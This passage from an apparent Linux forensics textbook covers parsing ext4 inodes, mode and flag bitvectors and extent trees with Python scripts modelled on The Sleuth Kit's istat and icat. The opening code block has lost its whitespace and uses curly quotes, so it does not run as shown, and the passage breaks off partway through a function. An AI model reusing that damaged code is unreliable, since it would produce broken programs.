This helper function parses the mode bitvector
stored in an inode. It accepts a 16-bit mode
bitvector and returns a list of strings.
"""

defgetInodeModes(mode):

retVal=[]

ifmode&0x1:

retVal.append(“OthersExec”)

ifmode&0x2:

retVal.append(“OthersWrite”)

ifmode&0x4:

retVal.append(“OthersRead”)

ifmode&0x8:

retVal.append(“GroupExec”)

ifmode&0x10:

retVal.append(“GroupWrite”)

ifmode&0x20:

retVal.append(“GroupRead”)

ifmode&0x40:

retVal.append(“OwnerExec”)

ifmode&0x80:

retVal.append(“OwnerWrite”)

ifmode&0x100:

retVal.append(“OwnerRead”)

ifmode&0x200:

retVal.append(“StickyBit”)

ifmode&0x400:

retVal.append(“SetGID”)

ifmode&0x800:

retVal.append(“SetUID”)

returnretVal

"""
This helper function parses the mode bitvector
stored in an inode in order to get file type.
It accepts a 16-bit mode bitvector and
returns a string.
"""

defgetInodeFileType(mode):

fType=(mode&0xf000)>>12

iffType==0x1:

return“FIFO”

eliffType==0x2:

return“CharDevice”

eliffType==0x4:

return“Directory”

eliffType==0x6:

return“BlockDevice”

eliffType==0x8:

return“RegularFile”

eliffType==0xA:

return“SymbolicLink”

eliffType==0xc:

return“Socket”

else:

return“UnknownFiletype”

"""
This helper function parses the flags bitvector
stored in an inode. It accepts a 32-bit flags
bitvector and returns a list of strings.
"""

defgetInodeFlags(flags):

retVal=[]

ifflags&0x1:

retVal.append(“SecureDeletion”)

ifflags&0x2:

retVal.append(“PreserveforUndelete”)

ifflags&0x4:

retVal.append(“CompressedFile”)

ifflags&0x8:

retVal.append(“SynchronousWrites”)

ifflags&0x10:

retVal.append(“ImmutableFile”)

ifflags&0x20:

retVal.append(“AppendOnly”)

ifflags&0x40:

retVal.append(“DoNotDump”)

ifflags&0x80:

retVal.append(“DoNotUpdateAccessTime”)

ifflags&0x100:

retVal.append(“DirtyCompressedFile”)

ifflags&0x200:

retVal.append(“CompressedClusters”)

ifflags&0x400:

retVal.append(“DoNotCompress”)

ifflags&0x800:

retVal.append(“EncryptedInode”)

ifflags&0x1000:

retVal.append(“DirectoryHashIndexes”)

ifflags&0x2000:

retVal.append(“AFSMagicDirectory”)

ifflags&0x4000:

retVal.append(“MustBeWrittenThroughJournal”)

ifflags&0x8000:

retVal.append(“DoNotMergeFileTail”)

ifflags&0x10000:

        retVal.append("Directory Entries Written Synchronously")

ifflags&0x20000:

retVal.append(“TopofDirectoryHierarchy”)

ifflags&0x40000:

retVal.append(“HugeFile”)

ifflags&0x80000:

retVal.append(“InodeusesExtents”)

ifflags&0x200000:

retVal.append(“LargeExtendedAttributeinInode”)

ifflags&0x400000:

retVal.append(“BlocksPastEOF”)

ifflags&0x1000000:

retVal.append(“InodeisSnapshot”)

ifflags&0x4000000:

retVal.append(“SnapshotisbeingDeleted”)

ifflags&0x8000000:

retVal.append(“SnapshotShrinkCompleted”)

ifflags&0x10000000:

retVal.append(“InlineData”)

ifflags&0x80000000:

retVal.append(“ReservedforExt4Library”)

ifflags&0x4bdfff:

retVal.append(“User-visibleFlags”)

ifflags&0x4b80ff:

retVal.append(“User-modifiableFlags”)

returnretVal

"""
This helper function will convert an inode
number to a block group and index within the
block group.

Usage: [bg, index] = getInodeLoc(inodeNo, inodesPerGroup)
"""

defgetInodeLoc(inodeNo,inodesPerGroup):

bg=(int(inodeNo)-1)/int(inodesPerGroup)

index=(int(inodeNo)-1)%int(inodesPerGroup)

return[bg,index]

"""
Class Inode. This class stores extended filesystem
inode information in an orderly manner and provides
a helper function for pretty printing. The constructor accepts
a packed string containing the inode data and inode size
which is defaulted to 128 bytes as used by ext2 and ext3.
For inodes > 128 bytes the extra fields are decoded.

Usage: inode = Inode(dataInPackedString, inodeSize)
inode.prettyPrint()
"""

classInode():

def__init__(self,data,inodeSize=128):

#storeboththerawmodebitvectorandinterpretation

self.mode=getU16(data)

self.modeList=getInodeModes(self.mode)

self.fileType=getInodeFileType(self.mode)

self.ownerID=getU16(data,0x2)

self.fileSize=getU32(data,0x4)

#gettimesinsecondssinceepoch

#note:thesewillrolloverin2038withoutextra

#bitsstoredintheextrainodefieldsbelow

self.accessTime=time.gmtime(getU32(data,0x8))

self.changeTime=time.gmtime(getU32(data,0xC))

self.modifyTime=time.gmtime(getU32(data,0x10))

self.deleteTime=time.gmtime(getU32(data,0x14))

self.groupID=getU16(data,0x18)

self.links=getU16(data,0x1a)

self.blocks=getU32(data,0x1c)

#storeboththerawflagsbitvectorandinterpretation

self.flags=getU32(data,0x20)

self.flagList=getInodeFlags(self.flags)

#high32-bitsofgenerationforLinux

self.osd1=getU32(data,0x24)

#storethe15valuesfromtheblockarray

#note:thesemaynotbeactualblocksif

#certainfeatureslikeextentsareenabled

self.block=[]

foriinrange(0,15):

self.block.append(getU32(data,0x28+i*4))

self.generation=getU32(data,0x64)

#themostcommonextenedattributesareACLs

#butotherEAsarepossible

self.extendAttribs=getU32(data,0x68)

self.fileSize+=pow(2,32)*getU32(data,0x6c)

#thesearetechnicallyonlycorrectforLinuxext4filesystems

#shouldprobablyverifythatthatisthecase

self.blocks+=getU16(data,0x74)*pow(2,32)

self.extendAttribs+=getU16(data,0x76)*pow(2,32)

self.ownerID+=getU16(data,0x78)*pow(2,32)

self.groupID+=getU16(data,0x7a)*pow(2,32)

self.checksum=getU16(data,0x7c)

#ext4uses256byteinodesonthedisk

#asofJuly2015thelogicalsizeis156bytes

#thefirstwordisthesizeoftheextrainfo

ifinodeSize>128:

self.inodeSize=128+getU16(data,0x80)

#thisistheupperwordofthechecksum

ifself.inodeSize>0x82:

self.checksum+=getU16(data,0x82)*pow(2,16)

#theseextrabitsgivenanosecondaccuracyoftimestamps

#thelower2bitsareusedtoextendthe32-bitseconds

#sincetheepochcounterto34bits

#ifyouarestillusingthisscriptin2038youshould

#adjustthisscriptaccordingly:-)

ifself.inodeSize>0x84:

self.changeTimeNanosecs=getU32(data,0x84)>>2

ifself.inodeSize>0x88:

self.modifyTimeNanosecs=getU32(data,0x88)>>2

ifself.inodeSize>0x8c:

self.accessTimeNanosecs=getU32(data,0x8c)>>2

ifself.inodeSize>0x90:

self.createTime=time.gmtime(getU32(data,0x90))

self.createTimeNanosecs=getU32(data,0x94)>>2

else:

self.createTime=time.gmtime(0)

defprettyPrint(self):

fork,vinsorted(self.__dict__.iteritems()):

printk+”:”,v

The first three helper functions are straightforward. The line return [bg, index] in getInodeLoc is the Python way of returning more than one value from a function. We have returned lists (usually of strings) before, but the syntax here is slightly different.
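As a quick illustration of returning two values at once, the sketch below repeats the arithmetic from getInodeLoc under a different name (get_inode_loc is used here only to keep the example self-contained) and unpacks the result into two variables. The figure of 8192 inodes per group is an assumed value for the example, not one taken from the subject image.

```python
def get_inode_loc(inode_no, inodes_per_group):
    """Return [block group, index within group] for a 1-based inode number."""
    bg = (int(inode_no) - 1) // int(inodes_per_group)
    index = (int(inode_no) - 1) % int(inodes_per_group)
    return [bg, index]

# the returned list can be unpacked into two names in one statement
bg, index = get_inode_loc(8193, 8192)
print("block group %d, index %d" % (bg, index))  # block group 1, index 0
```

Inode 8193 is the first inode of the second block group because inode numbering starts at 1, which is why 1 is subtracted before dividing.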

There is something new in the Inode class. When interpreting the extra timestamp bits, the right shift operator (>>) has been used. Writing x >> y causes the bits in x to be shifted y places to the right. By shifting everything two bits to the right we discard the lower two bits, which are used to extend the seconds counter (which should not be a problem until 2038), and effectively divide our 32-bit value by four. The shift operators are very fast and efficient. Incidentally, the left shift operator (<<) is used to shift bits in the other direction (multiplication).
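A minimal sketch of the two operations on one of the extra timestamp fields follows. The function name split_extra_timestamp and the sample value are made up for illustration; only the layout (nanoseconds in the upper 30 bits, seconds extension in the lower 2 bits) comes from the discussion above.

```python
def split_extra_timestamp(extra):
    """Split a 32-bit extra timestamp field into its two parts."""
    nanoseconds = extra >> 2   # drop the lower two bits
    epoch_bits = extra & 0x3   # keep only the lower two bits
    return nanoseconds, epoch_bits

# build a sample field with a left shift, then take it apart again
extra = (123456789 << 2) | 0x1
nanoseconds, epoch_bits = split_extra_timestamp(extra)
print("%d nanoseconds, epoch bits %d" % (nanoseconds, epoch_bits))
```

The bitwise AND with 0x3 recovers the two bits that the right shift throws away, which is what a script would need once the 32-bit seconds counter rolls over.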

A script named istat.py has been created. Its functionality is similar to that of the istat utility from The Sleuth Kit. It expects an image file, offset to the start of a filesystem in sectors, and an inode number as inputs. The script follows.

#!/usr/bin/python
#
# istat.py
#
# This is a simple Python script that will
# print out metadata in an inode from an ext2/3/4 filesystem inside
# of an image file.
#
# Developed for PentesterAcademy
# by Dr. Phil Polstra (@ppolstra)

import extfs
import sys
import os.path
import subprocess
import struct
import time
from math import log

def usage():
    print("usage " + sys.argv[0] + \
        " <image file> <offset> <inode number>\n" + \
        "Displays inode information from an image file")
    sys.exit(1)

def main():
    # three parameters are required: image file, offset, and inode number
    if len(sys.argv) < 4:
        usage()

    # make sure the image file exists
    if not os.path.isfile(sys.argv[1]):
        print("File " + sys.argv[1] + " cannot be opened for reading")
        sys.exit(1)
    emd = extfs.ExtMetadata(sys.argv[1], sys.argv[2])
    # get inode location
    inodeLoc = extfs.getInodeLoc(sys.argv[3], \
        emd.superblock.inodesPerGroup)
    offset = emd.bgdList[inodeLoc[0]].inodeTable \
        * emd.superblock.blockSize + \
        inodeLoc[1] * emd.superblock.inodeSize
    with open(str(sys.argv[1]), 'rb') as f:
        f.seek(offset + int(sys.argv[2]) * 512)
        data = str(f.read(emd.superblock.inodeSize))
    inode = extfs.Inode(data, emd.superblock.inodeSize)
    print "Inode %s in Block Group %s at index %s" % (str(sys.argv[3]), \
        str(inodeLoc[0]), str(inodeLoc[1]))
    inode.prettyPrint()

if __name__ == "__main__":
    main()

In this script we have imported the extfs.py file with the line import extfs. Notice that there is no file extension in the import statement. The script is straightforward. We see the typical usage function that is called if insufficient parameters are passed into the script. An extended metadata object is created, then the location of the inode in question is calculated. Once the location is known, the inode data is retrieved from the file and used to create an inode object which is printed to the screen. Notice that “extfs.” must be prepended to the function names now that we are calling code outside of the current file. We could avoid this by changing the import statement to from extfs import *, but I did not do so as I feel having the “extfs.” makes the code clearer.
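The offset calculation in the script can be worked through on its own. The sketch below is a standalone restatement of that arithmetic; the function name inode_byte_offset and every number passed to it (inode table at block 1059, filesystem starting at sector 2048, and so on) are assumptions chosen for the example rather than values from the PFE image.

```python
SECTOR_SIZE = 512

def inode_byte_offset(inode_no, inodes_per_group, inode_table_block,
                      block_size, inode_size, fs_start_sector):
    """Byte offset of an inode inside a raw image file.

    inode_table_block must be the inode table start block for the
    block group that holds inode_no.
    """
    index = (inode_no - 1) % inodes_per_group
    return (fs_start_sector * SECTOR_SIZE
            + inode_table_block * block_size
            + index * inode_size)

offset = inode_byte_offset(inode_no=12, inodes_per_group=8192,
                           inode_table_block=1059, block_size=4096,
                           inode_size=256, fs_start_sector=2048)
print(offset)  # 5389056
```

Keeping the three terms separate (start of the filesystem, start of the inode table, position within the table) makes it easier to check a result by hand against a hex dump.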

Results of running this new script against one of the interesting inodes from the PFE subject system image are shown in Figure 7.21. A couple of things about this inode should be noted. First, the flags indicate that this inode uses extents, which means the block array has a different interpretation (more about this later in this chapter). Second, this inode contains a creation time. Because this is a new field only available in ext4 filesystems, many tools, including those for altering timestamps, do not change this field. Obviously, this unaltered timestamp is good data for the forensic investigator. Now that we have learned about the generic inodes, we are ready to move on to a discussion of some inode extensions that will be present if the filesystem has certain features enabled.

FIGURE 7.21

Results of running istat.py on an inode associated with a rootkit on the PFE subject system.

Inode extensions and details

You may have noticed from the script in the previous section that the file mode bit vector in the inode contains more than just the file mode. In addition to the standard mode information which may be changed via the chmod command, the type of file is also stored. The file mode bit vector is summarized in Table 7.8.

Table 7.8. File mode bit vector from the inode. The file type items (bits 15 through 12) are mutually exclusive.

Bit   Meaning
15    Regular, or Symlink w/ Bit 13, or Socket w/ Bit 14
14    Directory, or Block Device w/ Bit 13
13    Char Device, or Block Device w/ Bit 14
12    FIFO
11    Set UID
10    Set GID
9     Sticky Bit
8     Owner Read
7     Owner Write
6     Owner Execute
5     Group Read
4     Group Write
3     Group Execute
2     Others Read
1     Others Write
0     Others Execute

Upon examining Table 7.8, the lower twelve bits should look familiar as all of these modes may be changed via the standard Linux chmod (change mode) command. These file modes are not mutually exclusive. The upper four bits are used to specify the file type. Each file is allowed only one type. The file types are broken out in Table 7.9.

Table 7.9. Decoding the file type from the upper four bits of the inode file mode.

Meaning             Bit 15   Bit 14   Bit 13   Bit 12
FIFO (pipe)         0        0        0        1
Character Device    0        0        1        0
Directory           0        1        0        0
Block Device        0        1        1        0
Regular File        1        0        0        0
Symbolic Link       1        0        1        0
Socket              1        1        0        0
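Tables 7.8 and 7.9 can be applied with one shift and two masks. The sketch below is one possible way to do it; decode_mode and FILE_TYPES are names invented for this example and are separate from the getInodeFileType helper in extfs.py.

```python
# upper four bits of the mode, as listed in Table 7.9
FILE_TYPES = {
    0x1: "FIFO (pipe)",
    0x2: "Character Device",
    0x4: "Directory",
    0x6: "Block Device",
    0x8: "Regular File",
    0xA: "Symbolic Link",
    0xC: "Socket",
}

def decode_mode(mode):
    """Return (file type string, lower twelve permission bits)."""
    file_type = FILE_TYPES.get((mode >> 12) & 0xF, "Unknown")
    permissions = mode & 0x0FFF
    return file_type, permissions

file_type, permissions = decode_mode(0x81A4)
print("%s, mode %o" % (file_type, permissions))  # Regular File, mode 644
```

Printing the lower twelve bits in octal gives the same digits that would be passed to chmod.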

The inode contains a 32-bit bit vector of flags. The lower word of flags is summarized in Table 7.10. Some flags may lack operating system support. Investigators familiar with Windows may know that there is a registry flag, HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate, which can be used to disable access time updating on NTFS directories. Bit 7, no access time updating, provides a similar function on an extended filesystem, but at the individual file or directory level.

Table 7.10. Lower word of inode flags.

Bit   Meaning
15    File tail not merged
14    Data written through journal
13    AFS Magic
12    Directory has hash indexes
11    Encrypted Inode
10    Don’t compress file
9     Compressed clusters
8     Dirty compressed file
7     No access time updating
6     No Dump
5     Append Only
4     File is immutable
3     Synchronous Writes
2     File is compressed
1     Preserve for undelete
0     Secure Deletion

The high word of inode flags is summarized in Table 7.11. Most of these flags only make sense in the context of ext4 optional features. Bit 28, inode has inline data, is used to store very small files entirely within the inode. The first 60 bytes are stored in the block array (which is not needed to store blocks). If the file grows beyond 60 bytes up to about 160 bytes, bytes 60 and up are stored in the space between inodes (currently 100 bytes). If the file exceeds 160 bytes, all of the data is moved to a regular block.

Table 7.11. Upper word of inode flags.

Bit   Meaning
31    Reserved for Ext4 library
30    Unused
29    Unused
28    Inode has inline data
27    Snapshot shrink completed
26    Snapshot is being deleted
25    Unused
24    Inode is snapshot
23    Unused
22    Blocks past end of file (deprecated)
21    Inode stores large extended attribute
20    Unused
19    Inode uses extents
18    Huge File
17    Top of directory
16    Directory entry sync writes

Huge files specify their size in clusters, not blocks. The cluster size is stored in the superblock when huge files are present on a filesystem. Huge files require the Extents feature. Extents will be discussed in detail later in this chapter. Like in-line data, extents use the 60 bytes in the block array for a different purpose. We have said that an inode is the keeper of file metadata. In the next section we will discuss how to retrieve a file based on information stored in the inode.

Going from an inode to a file

We have discussed the fifteen entries in the block array and how they are used to specify data blocks which house a file. We have also seen that these sixty bytes may be re-purposed for certain cases. If the inode stores a symbolic link and the target is less than sixty bytes long it will be stored in the block array. If the in-line data flag is set, the first sixty bytes of a file are in this space. We have also mentioned that extents use this space differently.

When parsing an inode for the list of blocks contained in a file (or directory) in the most generic situation (i.e. no extents), we read the first twelve entries in the block array and add any non-zero values to our list of blocks. If the thirteenth entry is non-zero, we read in the block with the address stored there, which contains a list of up to 1024 blocks. Any non-zero entries from the data block are added to our list. This allows files as large as 4 megabytes + 48 kilobytes to be handled.

If there is an entry in the fourteenth block array item, we load the specified data block which contains a list of data blocks which in turn contain lists of data blocks. There are up to 1024 * 1024 entries in this doubly indirect level, all of which point to 4 kilobyte blocks, which allow files as large as 4 gigabytes + 4 megabytes + 48 kilobytes to be handled. If this is still not enough, the last entry is for a triply indirect block which permits files as large as 4 terabytes + 4 gigabytes + 4 megabytes + 48 kilobytes, at least in theory. If you have an ext4 filesystem, it is much more likely to use extents, which are discussed in the next section.
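The size limits quoted above follow directly from the block size and the four-byte block addresses. The short sketch below reproduces the arithmetic for a 4 kilobyte block size; max_file_sizes is a name made up for this example.

```python
def max_file_sizes(block_size=4096):
    """Cumulative file size limits, in bytes, at each level of indirection."""
    pointers = block_size // 4             # 4-byte block addresses per block
    direct = 12 * block_size               # twelve direct entries
    single = pointers * block_size         # singly indirect block
    double = pointers ** 2 * block_size    # doubly indirect block
    triple = pointers ** 3 * block_size    # triply indirect block
    return (direct,
            direct + single,
            direct + single + double,
            direct + single + double + triple)

KB, MB, GB, TB = 2 ** 10, 2 ** 20, 2 ** 30, 2 ** 40
limits = max_file_sizes()
print(limits[1] == 4 * MB + 48 * KB)                     # True
print(limits[3] == 4 * TB + 4 * GB + 4 * MB + 48 * KB)   # True
```

Passing a different block_size shows how quickly the limits shrink on filesystems with 1 or 2 kilobyte blocks.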

Extents

The system for storing lists of data blocks described in the previous section is fine when most files are small. When file sizes are measured in megabytes, gigabytes, or terabytes, performance quickly becomes an issue, however. To be fair, the Linux extended filesystem has been around for decades and yet is perfectly acceptable as is for many users. The elegant solution to improve performance for large files is the use of extents.

Extents store lists of contiguous blocks in a tree structure. Those familiar with NTFS will know that it uses a list of data runs (contiguous clusters) in a similar manner. As with most things in Linux, storing block lists in a tree is much more efficient than the simple list used in Windows. Three types of structures are required to build an extent tree. Every extent tree node must have a header that indicates what is stored in the node. The top node of a tree is often referred to as the root node. The root node header is always stored at the start of the inode block array. All non-empty extent trees must have at least one leaf node which is called an extent (which is essentially equivalent to the NTFS data run). There may be middle nodes between the root node and leaf nodes which are called indexes. All three types of structures have a length of 12 bytes, which allows the root node header plus four entries to be stored in the inode block array.

The extent header is summarized in Table 7.12. The header begins with a magic number which is a double-check that what follows is not a traditional direct data block entry. If the depth is zero, the entries that follow the header in this node are leaf nodes (extents). Otherwise the entries are for index (middle) nodes. If you work out the math, storing the largest file supported by ext4 should never require more than five levels in the tree.

Table 7.12. Extent header format.

Offset  Size  Name         Description
0x0     2     Magic        Magic number 0xF30A
0x2     2     Entries      Entries that follow the header
0x4     2     Max Entries  Maximum number of entries that might follow header
0x6     2     Depth        0 = this node points to data blocks
                           1-5 = this node points to other extents
0x8     4     Generation   Generation of the tree
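Table 7.12 maps onto a single struct.unpack_from call. The sketch below assumes little-endian fields, as used throughout the extended filesystem, and uses a hand-built 12-byte sample instead of data read from an image; parse_extent_header is a hypothetical name that is independent of the classes in extfs.py.

```python
import struct

EXTENT_MAGIC = 0xF30A

def parse_extent_header(data):
    """Decode the 12-byte extent header found at the start of a node."""
    magic, entries, max_entries, depth, generation = \
        struct.unpack_from("<HHHHI", data, 0)
    if magic != EXTENT_MAGIC:
        raise ValueError("not an extent header")
    return {"entries": entries, "max_entries": max_entries,
            "depth": depth, "generation": generation}

# sample header: one entry in use out of four, leaf level (depth 0)
sample = struct.pack("<HHHHI", EXTENT_MAGIC, 1, 4, 0, 0)
header = parse_extent_header(sample)
print("entries %d, depth %d" % (header["entries"], header["depth"]))
```

Checking the magic number first guards against treating a traditional block array as an extent tree.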

The extent index node entry is summarized in Table 7.13. The block in the first field is a logical block number (the file is contained in logical block zero through total blocks minus one). For those familiar with NTFS, this is similar to a Virtual Cluster Number (VCN). The only real data in an index node is a 48-bit block address for the node one level lower in the tree.

Table 7.13. Extent index format.

Offset  Size  Name     Description
0x0     4     Block    This node covers block x and following
0x4     4     Leaf lo  Lower 32 bits of block containing the node (leaf or another index) one level lower in tree
0x8     2     Leaf hi  Upper 16 bits of the block described above
0xA     2     Unused   Padding to 12 byte size

The extent (leaf) node entry is summarized in Table 7.14. As with the index node, the first field is a logical block number. This is followed by a length. This length is normally less than 32,768. However, if uninitialized blocks are supported on this filesystem (say with the lazy block group feature), a value greater than 32,768 indicates that the extent consists of (length - 32,768) uninitialized data blocks. This is not common. The extent ends with a 48-bit data block address for the first block in this extent.

Table 7.14. Extent node format.

Offset  Size  Name      Description
0x0     4     Block     First block covered by this extent
0x4     2     Len       If <= 32768, initialized blocks in extent
                        If > 32768, extent is (len - 32768) uninit blocks
0x6     2     Start hi  Upper 16 bits of the starting block
0x8     4     Start lo  Lower 32 bits of the starting block
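As a small illustration of Table 7.14, the sketch below decodes a 12-byte leaf entry, combines the two halves of the 48-bit starting block, and applies the length rule for uninitialized extents. The function name parse_extent and the sample values are assumptions for the example; little-endian byte order is assumed as elsewhere in the extended filesystem.

```python
import struct

def parse_extent(data):
    """Return (logical block, length, starting block, initialized flag)."""
    block, length, start_hi, start_lo = struct.unpack_from("<IHHI", data, 0)
    initialized = length <= 32768
    if not initialized:
        length -= 32768                    # uninitialized extent
    start = (start_hi << 32) | start_lo    # 48-bit block address
    return block, length, start, initialized

# an 8-block extent covering logical block 0, stored at block 34816
sample = struct.pack("<IHHI", 0, 8, 0, 34816)
print(parse_extent(sample))  # (0, 8, 34816, True)
```

The left shift by 32 places the upper 16 bits above the lower 32, which is the same as multiplying by pow(2, 32).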

Based on what we have learned about extents, we can update our extfs.py and istat.py files to more accurately report what is stored in the inode block array when extents are being used. I should point out that if there are multiple levels in the extent tree, the entire tree will not be printed out; only the four entries from the inode block array will be included. The reason for this is that parsing a multi-level tree requires data blocks to be read. This is not as big of an issue as it might seem at first. Four leaf nodes storing 32,768 block extents permit files as large as 32,768 * 4 * 4096 or 536,870,912 bytes (512 MB) to be stored entirely within the inode block array. The following code, containing three small classes and a helper function, needs to be added to our extfs.py file.

"""
Class ExtentHeader. Parses the 12-byte extent
header that is present in every extent node
in a Linux ext4 filesystem inode with the extent
flag set. Accepts a 12-byte packed string.
Usage: eh = ExtentHeader(data)
       eh.prettyPrint()
"""
class ExtentHeader():
    def __init__(self, data):
        self.magic = getU16(data)
        self.entries = getU16(data, 0x2)
        self.max = getU16(data, 0x4)
        self.depth = getU16(data, 0x6)
        self.generation = getU32(data, 0x8)

    def prettyPrint(self):
        print("Extent depth: %s entries: %s max-entries: %s generation: %s" \
            % (self.depth, self.entries, self.max, self.generation))

"""
Class ExtentIndex. Represents a middle
or index node in an extent tree. Accepts
a 12-byte packed string containing the index.
Usage: ei = ExtentIndex(data)
       ei.prettyPrint()
"""
class ExtentIndex():
    def __init__(self, data):
        self.block = getU32(data)
        self.leafLo = getU32(data, 0x4)
        self.leafHi = getU16(data, 0x8)

    def prettyPrint(self):
        print("Index block: %s leaf: %s" \
            % (self.block, self.leafHi * pow(2, 32) + self.leafLo))

"""
Class Extent. Represents a leaf node
or extent in an extent tree. Accepts
a 12-byte packed string containing the extent.
Usage: ext = Extent(data)
       ext.prettyPrint()
"""
class Extent():
    def __init__(self, data):
        self.block = getU32(data)
        self.len = getU16(data, 0x4)
        self.startHi = getU16(data, 0x6)
        self.startLo = getU32(data, 0x8)

    def prettyPrint(self):
        print("Extent block: %s data blocks: %s - %s" \
            % (self.block, self.startHi * pow(2, 32) + self.startLo, \
            self.len + self.startHi * pow(2, 32) + self.startLo - 1))

"""
Function getExtentTree(data). This function
will get an extent tree from the passed in
packed string.
Note 1: Only the data passed into the function is
parsed. If the nodes are index nodes the tree is
not traversed.
Note 2: In the most common case the data passed in
will be the 60 bytes from the inode block array. This
permits files up to 512 MB to be stored.
"""
def getExtentTree(data):
    # first entry must be a header
    retVal = []
    retVal.append(ExtentHeader(data))
    if retVal[0].depth == 0:
        # leaf node
        for i in range(0, retVal[0].entries):
            retVal.append(Extent(data[(i + 1) * 12:]))
    else:
        # index nodes
        for i in range(0, retVal[0].entries):
            retVal.append(ExtentIndex(data[(i + 1) * 12:]))
    return retVal

This code uses no techniques that have not been covered in this book thus far. We must also modify the Inode class in order to handle the extents properly. The updated Inode class is shown in the following code. The new code is the extent handling in the constructor and the revised prettyPrint method.

"""
Class Inode. This class stores extended filesystem
inode information in an orderly manner and provides
a helper function for pretty printing. The constructor accepts
a packed string containing the inode data and inode size
which is defaulted to 128 bytes as used by ext2 and ext3.
For inodes > 128 bytes the extra fields are decoded.
Usage inode = Inode(dataInPackedString, inodeSize)
      inode.prettyPrint()
"""
class Inode():
    def __init__(self, data, inodeSize=128):
        # store both the raw mode bitvector and interpretation
        self.mode = getU16(data)
        self.modeList = getInodeModes(self.mode)
        self.fileType = getInodeFileType(self.mode)
        self.ownerID = getU16(data, 0x2)
        self.fileSize = getU32(data, 0x4)
        # get times in seconds since epoch
        # note: these will rollover in 2038 without extra
        # bits stored in the extra inode fields below
        self.accessTime = time.gmtime(getU32(data, 0x8))
        self.changeTime = time.gmtime(getU32(data, 0xC))
        self.modifyTime = time.gmtime(getU32(data, 0x10))
        self.deleteTime = time.gmtime(getU32(data, 0x14))
        self.groupID = getU16(data, 0x18)
        self.links = getU16(data, 0x1a)
        self.blocks = getU32(data, 0x1c)
        # store both the raw flags bitvector and interpretation
        self.flags = getU32(data, 0x20)
        self.flagList = getInodeFlags(self.flags)
        # high 32-bits of generation for Linux
        self.osd1 = getU32(data, 0x24)
        # store the 15 values from the block array
        # note: these may not be actual blocks if
        # certain features like extents are enabled
        self.block = []
        self.extents = []
        if self.flags & 0x80000:
            self.extents = getExtentTree(data[0x28:])
        else:
            for i in range(0, 15):
                self.block.append(getU32(data, 0x28 + i * 4))
        self.generation = getU32(data, 0x64)
        # the most common extended attributes are ACLs
        # but other EAs are possible
        self.extendAttribs = getU32(data, 0x68)
        self.fileSize += pow(2, 32) * getU32(data, 0x6c)
        # these are technically only correct for Linux ext4 filesystems
        # should probably verify that that is the case
        self.blocks += getU16(data, 0x74) * pow(2, 32)
        self.extendAttribs += getU16(data, 0x76) * pow(2, 32)
        # the owner and group IDs are 16-bit values, so the
        # upper halves are shifted by 16 bits, not 32
        self.ownerID += getU16(data, 0x78) * pow(2, 16)
        self.groupID += getU16(data, 0x7a) * pow(2, 16)
        self.checksum = getU16(data, 0x7c)
        # ext4 uses 256 byte inodes on the disk
        # as of July 2015 the logical size is 156 bytes
        # the first word is the size of the extra info
        if inodeSize > 128:
            self.inodeSize = 128 + getU16(data, 0x80)
            # this is the upper word of the checksum
            if self.inodeSize > 0x82:
                self.checksum += getU16(data, 0x82) * pow(2, 16)
            # these extra bits give nanosecond accuracy of timestamps
            # the lower 2 bits are used to extend the 32-bit seconds
            # since the epoch counter to 34 bits
            # if you are still using this script in 2038 you should
            # adjust this script accordingly :-)
            if self.inodeSize > 0x84:
                self.changeTimeNanosecs = getU32(data, 0x84) >> 2
            if self.inodeSize > 0x88:
                self.modifyTimeNanosecs = getU32(data, 0x88) >> 2
            if self.inodeSize > 0x8c:
                self.accessTimeNanosecs = getU32(data, 0x8c) >> 2
            if self.inodeSize > 0x90:
                self.createTime = time.gmtime(getU32(data, 0x90))
                self.createTimeNanosecs = getU32(data, 0x94) >> 2
            else:
                self.createTime = time.gmtime(0)

    # note: calendar.timegm is used below, so extfs.py
    # must contain "import calendar" along with its other imports
    def prettyPrint(self):
        for k, v in sorted(self.__dict__.iteritems()):
            if k == 'extents' and self.extents:
                v[0].prettyPrint()  # print header
                for i in range(1, v[0].entries + 1):
                    v[i].prettyPrint()
            elif k == 'changeTime' or k == 'modifyTime' or \
                k == 'accessTime' \
                or k == 'createTime':
                print k + ":", time.asctime(v)
            elif k == 'deleteTime':
                if calendar.timegm(v) == 0:
                    print 'Deleted: no'
                else:
                    print k + ":", time.asctime(v)
            else:
                print k + ":", v

The results of running istat.py with the updated extfs.py file are shown in Figure 7.22. The highlighted lines show what has been added.

FIGURE 7.22

Results of running istat.py against an inode associated with a rootkit on the PFE subject system. The highlighted lines show information about the extent used to store this file.

Now that we can read the block information for both traditional blocks and extents, a script to retrieve a file from its inode is easily created. The new script will be named icat.py. The Sleuth Kit provides a similar utility named icat. We will begin by adding two new helper functions to extfs.py. The new code follows.

# get a data block from an image
def getDataBlock(imageFilename, offset, blockNo, blockSize=4096):
    with open(str(imageFilename), 'rb') as f:
        # int() allows the offset to be passed in as a string
        # taken directly from the command line
        f.seek(blockSize * blockNo + int(offset) * 512)
        data = str(f.read(blockSize))
    return data

"""
function getBlockList
This function will return a list of data blocks.
If extents are being used this should be simple assuming
there is a single level to the tree.
For extents with multiple levels and for indirect blocks
additional "disk access" is required.
Usage: bl = getBlockList(inode, imageFilename, offset, blockSize)
where inode is the inode object, imageFilename is the name of a
raw image file, offset is the offset in 512 byte sectors to the
start of the filesystem, and blockSize (default 4096) is the
size of a data block.
"""
def getBlockList(inode, imageFilename, offset, blockSize=4096):
    # the offset may arrive as a string from the command line
    offset = int(offset)
    # now get the data blocks and output them
    datablocks = []
    if inode.extents:
        # great we are using extents
        # extent zero has the header
        # check for depth of zero which is most common
        if inode.extents[0].depth == 0:
            for i in range(1, inode.extents[0].entries + 1):
                sb = inode.extents[i].startHi * pow(2, 32) + \
                    inode.extents[i].startLo
                eb = sb + inode.extents[i].len  # really ends in this minus 1
                for j in range(sb, eb):
                    datablocks.append(j)
        else:
            # load this level of the tree
            currentLevel = inode.extents
            leafNode = []
            while currentLevel[0].depth != 0:
                # read the current level; the nodes one level down are
                # merged into a single list (one header followed by all
                # of their entries) so that currentLevel[0] is always
                # a header
                nextLevel = []
                for i in range(1, len(currentLevel)):
                    blockNo = currentLevel[i].leafLo + \
                        currentLevel[i].leafHi * pow(2, 32)
                    currnode = getExtentTree(getDataBlock(imageFilename, \
                        offset, blockNo, blockSize))
                    if not nextLevel:
                        nextLevel.append(currnode[0])
                    nextLevel.extend(currnode[1:])
                    if currnode[0].depth == 0:
                        # if there are leaves add them to the end
                        leafNode.extend(currnode[1:])
                if not nextLevel:
                    break  # index node without entries, nothing left to read
                currentLevel = nextLevel
